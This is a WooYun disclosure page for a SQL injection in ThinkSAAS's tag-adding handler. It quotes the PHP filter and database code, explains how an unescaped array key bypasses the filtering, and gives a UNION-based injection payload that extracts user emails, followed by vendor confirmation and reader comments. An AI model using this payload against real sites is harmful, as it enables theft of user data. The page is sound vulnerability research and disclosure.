当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-050236

漏洞标题:Thinksaas某处绕过过滤的注射漏洞

相关厂商:thinksaas.cn

漏洞作者: ′雨。

提交时间:2014-02-03 17:14

修复时间:2014-05-04 17:14

公开时间:2014-05-04 17:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-02-03: 细节已通知厂商并且等待厂商处理中
2014-02-04: 厂商已经确认,细节仅向厂商公开
2014-02-07: 细节向第三方安全合作伙伴开放
2014-03-31: 细节向核心白帽子及相关领域专家公开
2014-04-10: 细节向普通白帽子公开
2014-04-20: 细节向实习白帽子公开
2014-05-04: 细节向公众公开

简要描述:

添加标签过滤不严。

详细说明:

今天下了一个thinksaas 最新版, 就看了看
在xfkxfk 爆了一些洞后 还是变安全了一些。 但是还是有很多依旧没过滤。
xfkxfk 爆了app/tag/action/add.php
我看的漏洞文件 app/tag/action/add_ajax.php

case "do":
	
		$objname = t($_POST['objname']);
		$idname = t($_POST['idname']);
		$objid = t($_POST['objid']);
		$tags = t($_POST['tags']);
		
		$new['tag']->addTag($objname,$idname,$objid,$tags);
		
		echo "<script language=JavaScript>parent.window.location.reload();</script>";
	
		break;
}


做了过滤
function t($text) {
$text = preg_replace ( '/\[.*?\]/is', '', $text );
$text = cleanJs ( $text );
// 彻底过滤空格BY QINIAO
$text = preg_replace ( '/\s(?=\s)/', '', $text );
$text = preg_replace ( '/[\n\r\t]/', ' ', $text );
$text = str_replace ( ' ', ' ', $text );
// $text = str_replace ( ' ', '', $text );
$text = str_replace ( '&nbsp;', '', $text );
$text = str_replace ( '&', '', $text );
$text = str_replace ( '=', '', $text );
$text = str_replace ( '-', '', $text );
$text = str_replace ( '#', '', $text );
$text = str_replace ( '%', '', $text );
$text = str_replace ( '!', '', $text );
$text = str_replace ( '@', '', $text );
$text = str_replace ( '^', '', $text );
$text = str_replace ( '*', '', $text );
$text = str_replace ( 'amp;', '', $text );

$text = str_replace ( 'position', '', $text );

$text = strip_tags ( $text );
$text = htmlspecialchars ( $text );
$text = str_replace ( "'", "", $text );
return $text;
}</code>
过滤了单引号 还有各种注释。。
过滤了之后 带入了addTag

function addTag($objname,$idname,$objid,$tags){
	    
		if($objname != '' && $idname != '' && $objid!='' && $tags!=''){
			$tags = str_replace ( ',', ',', $tags );
			$arrTag = explode(',',$tags);
			foreach($arrTag as $item){
				$tagname = t($item);
				if(strlen($tagname) < '32' && $tagname != ''){
					$uptime = time();
					
					$tagcount = $this->findCount('tag',array(
						'tagname'=>$tagname,
					));
					
					if($tagcount == '0'){
						
						$tagid = $this->create('tag',array(
							'tagname'=>$tagname,
							'uptime'=>$uptime,
						));
						
						$tagIndexCount = $this->findCount('tag_'.$objname.'_index',array(
							$idname=>$objid,
							'tagid'=>$tagid,
						));
						
						if($tagIndexCount == '0'){
							
							$this->create("tag_".$objname."_index",array(
								$idname=>$objid,
								'tagid'=>$tagid,
							));
							
						}
						
						$tagIdCount = $this->findCount("tag_".$objname."_index",array(
							'tagid'=>$tagid,
						));
						
						$count_obj = "count_".$objname;
						
						$this->update('tag',array(
							'tagid'=>$tagid,
						),array(
							$count_obj=>$tagIdCount,
						));
						
					}else{
						$tagData = $this->find('tag',array(
							'tagname'=>$tagname,
						));
						
						$tagIndexCount = $this->findCount("tag_".$objname."_index",array(
							$idname=>$objid,
							'tagid'=>$tagData['tagid'],
						));
						
						if($tagIndexCount == '0'){
							
							$this->create("tag_".$objname."_index",array(
							
								$idname=>$objid,
								'tagid'=>$tagData['tagid'],
							
							));
							
						}
						
						$tagIdCount = $this->findCount("tag_".$objname."_index",array(
							'tagid'=>$tagData['tagid'],
						));
						
						$count_obj = "count_".$objname;
						
						$this->update('tag',array(
							'tagid'=>$tagData['tagid'],
						),array(
							$count_obj=>$tagIdCount,
							'uptime'=>$uptime,
						));
						
					}
					
				}
			}
		}
	}


$tagIndexCount = $this->findCount('tag_'.$objname.'_index',array(
							$idname=>$objid,
							'tagid'=>$tagid,
						));


可以看到 直接$idname 做key了。

public function findCount($table, $conditions = null) {
		$where = "";
		if (is_array ( $conditions )) {
			$join = array ();
			foreach ( $conditions as $key => $condition ) {
				$condition = $this->escape ( $condition );
				$join [] = "{$key} = {$condition}";
			}
			$where = "WHERE " . join ( " AND ", $join );
		} else {
			if (null != $conditions)
				$where = "WHERE " . $conditions;
		}
		$sql = "SELECT COUNT(*) AS ts_counter FROM " . dbprefix . "{$table} {$where}";
		$result = $this->db->once_fetch_assoc ( $sql );
		
		return $result ['ts_counter'];
	}


但是key是未过滤的。过滤了value
所以这里function t 过滤了单引号也没什么了 因为可以在key那里注入。
但是过滤了注释 后面这样就行了
objid=123&objname=article&idname=123 union select email from ts_user limit 1,1;a&tags=idname
即可注入。 可以盲注 、延时。

漏洞证明:

1.jpg


2.jpg


嗯 可以执行了。

修复方案:

但是 xfkxfk 爆的那个漏洞文件后 发布新版本后 你们做了过滤
但是过滤得不好, 会add_ajax 比好绕过。
为了避免和xfkxfk 爆的漏洞文件一样 所以我换了个文件。
加强过滤。

版权声明:转载请注明来源 ′雨。@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-02-04 15:34

厂商回复:

感谢支持,已经做了修复。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-05-04 18:01 | 黑色的屌丝 ( 路人 | Rank:27 漏洞数:5 | →_→→_→)

    洞主。这个objid=123&objname=article&idname=123 union select email from ts_user limit 1,1;a&tags=idname中的idname=123 union select email from ts_user limit 1,1;a这个注入代码是在value之中。为什么会绕过呢??

  2. 2014-05-22 14:07 | ′ 雨。 ( 普通白帽子 | Rank:1231 漏洞数:190 | Only Code Never Lie To Me.)

    原谅我一开始基础差 mysql query 不支持分号 别被我误导了 用其他的注释就行。

  3. 2014-05-22 14:09 | ′ 雨。 ( 普通白帽子 | Rank:1231 漏洞数:190 | Only Code Never Lie To Me.)

    @黑色的屌丝 不是key么

  4. 2014-05-22 19:36 | 黑色的屌丝 ( 路人 | Rank:27 漏洞数:5 | →_→→_→)

    @′ 雨。 前面没看仔细$tagIndexCount = $this->findCount('tag_'.$objname.'_index',array( $idname=>$objid,然后$join [] = "{$key} = {$condition}";进入了SQL? 'tagid'=>$tagid, ));这里成了key

  5. 2014-07-17 15:03 | 小贱人 ( 路人 | Rank:4 漏洞数:3 | 资深菜鸟,)

    代码审计大大的

  6. 2014-10-07 21:46 | PythonPig ( 普通白帽子 | Rank:491 漏洞数:71 | 只会简单工具的小小菜)

    @′ 雨。 请教审计大牛 查看mysql执行日志的工具是什么啊?我直接用文本方式打开格式让我很蛋碎~~

  7. 2014-10-07 22:00 | ′ 雨。 ( 普通白帽子 | Rank:1231 漏洞数:190 | Only Code Never Lie To Me.)

    @PythonPig 好像用的seay吧,

  8. 2014-10-07 22:54 | PythonPig ( 普通白帽子 | Rank:491 漏洞数:71 | 只会简单工具的小小菜)

    @′ 雨。 是的,thx

  9. 2014-11-08 11:19 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 | 总有一天,我会骑着雨牛@'雨。踩着一哥@jan...)

    注册乌云仅227天。rank就1027。奖金有百万了吧

  10. 2015-01-11 13:52 | 刘海哥 ( 普通白帽子 | Rank:114 漏洞数:28 | 索要联系方式但不送礼物的厂商定义为无良厂...)

    表示从雨哥第一个漏洞膜拜起!

  11. 2015-01-11 14:57 | ′雨。 ( 普通白帽子 | Rank:1231 漏洞数:190 | Only Code Never Lie To Me.)

    @刘海哥 无视前面的把。。 太傻逼了。

  12. 2015-01-11 15:46 | 刘海哥 ( 普通白帽子 | Rank:114 漏洞数:28 | 索要联系方式但不送礼物的厂商定义为无良厂...)

    @′雨。 我要从太傻逼学起。。。

  13. 2015-01-28 00:10 | onpu ( 实习白帽子 | Rank:64 漏洞数:19 | 静坐常思己过,闲谈莫论人非)

    果然厉害。。

  14. 2015-01-28 16:09 | 乐乐、 ( 普通白帽子 | Rank:853 漏洞数:189 )

    膜拜第一个洞